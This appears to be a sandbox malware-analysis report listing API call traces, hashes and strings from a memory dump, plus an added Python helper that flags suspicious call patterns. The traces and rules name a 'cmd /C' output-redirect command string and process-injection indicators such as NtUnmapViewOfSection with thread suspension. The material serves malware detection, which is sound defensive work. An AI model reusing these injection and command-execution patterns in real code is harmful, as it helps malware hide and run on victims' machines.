Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
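The per-function "APIs" lists above record which imports the sandbox observed at each call site, with the callee's own calls folded in as "Part of subcall function" lines. The Python below is an added example, not part of this Joe Sandbox report and not Joe Sandbox code: it parses that bullet format and applies a small, hypothetical set of triage rules to entries copied from this report (a `cmd /C` format string reaching CreateProcessA, OpenMutexA paired with SetLastError(000000B7), where 0xB7 is ERROR_ALREADY_EXISTS, RegCreateKeyA with hKey 80000001, which is HKEY_CURRENT_USER, and NtUnmapViewOfSection in the same call graph as SuspendThread/ResumeThread). Rule names and the choice of patterns are assumptions; a hit marks an entry for manual review in the disassembly and is not a statement about what the sample does.

```python
"""Triage helper for the per-function 'APIs' lists of a Joe Sandbox report.
Added example; not part of the report or of Joe Sandbox. Rules are a hypothetical
starting point: a hit flags an entry for manual review, nothing more."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Bullet shapes seen in the report; subcall prefix and argument list are both optional:
#   • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
#   • GetVersion.KERNEL32 ref: 001D81FD
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
_HEX = re.compile(r"^-?[0-9A-Fa-f]{8}$")  # DWORD arguments are printed as 8 hex digits

HKEY_CURRENT_USER = 0x80000001
ERROR_ALREADY_EXISTS = 0xB7  # Win32 error 183


@dataclass
class Call:
    api: str
    module: str
    args: list                     # int for 8-digit hex values, raw string otherwise ('?' = unknown)
    ref: int                       # call-site address
    subcall: Optional[int] = None  # callee whose body this call sits in (a 'Part of subcall' line)


@dataclass
class Entry:
    calls: list = field(default_factory=list)

    def has(self, api):
        return any(c.api == api for c in self.calls)

    def strings(self):
        return [a for c in self.calls for a in c.args if isinstance(a, str) and a != "?"]


def _arg(tok):
    tok = tok.strip()
    if _HEX.match(tok):
        value = int(tok.lstrip("-"), 16)
        return -value if tok.startswith("-") else value
    return tok


def parse_entries(text):
    """One Entry per 'APIs' heading. Argument lists are split on ','; that is safe for this
    report, whose string arguments contain no commas, but would break on quoted commas."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Entry()
            entries.append(current)
            continue
        m = _LINE.match(line)
        if m and current is not None:
            args = [_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            sub = int(m["sub"], 16) if m["sub"] else None
            current.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return entries


def _first_arg_is(entry, api_prefix, value):
    return any(c.api.startswith(api_prefix) and c.args[:1] == [value] for c in entry.calls)


# Hypothetical rules (assumption): each names a call pattern worth a manual look.
RULES = {
    "cmd_with_output_redirect": lambda e: e.has("CreateProcessA")
                                          and any("cmd /C" in s for s in e.strings()),
    "single_instance_mutex": lambda e: (e.has("OpenMutexA") or e.has("CreateMutexA"))
                                       and _first_arg_is(e, "SetLastError", ERROR_ALREADY_EXISTS),
    "hkcu_key_create": lambda e: _first_arg_is(e, "RegCreateKey", HKEY_CURRENT_USER),
    "unmap_with_thread_control": lambda e: e.has("NtUnmapViewOfSection")
                                           and (e.has("ResumeThread") or e.has("SuspendThread")),
}


def flag(entries):
    """Map entry index -> names of the rules that fired, for entries with at least one hit."""
    out = {}
    for i, e in enumerate(entries):
        hits = [name for name, rule in RULES.items() if rule(e)]
        if hits:
            out[i] = hits
    return out


# Lines copied from the report's own entries (a subset of each function's list).
SAMPLE = """\
APIs
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
APIs
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
APIs
  • wsprintfA.USER32 ref: 001C14CD
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
"""

if __name__ == "__main__":
    for idx, hits in flag(parse_entries(SAMPLE)).items():
        print(idx, hits)
```

Because the "Part of subcall function" lines are folded into the parent entry, a rule can fire on behaviour that lives in a callee rather than in the function itself; the `subcall` field keeps that callee's address so the analyst can jump straight to it. The `ref` address of each flagged call is what to open in the disassembly, and the negative arguments (for example `-0000000C` for RtlAllocateHeap) are decoded as signed values so size arithmetic in the rules stays meaningful.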
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
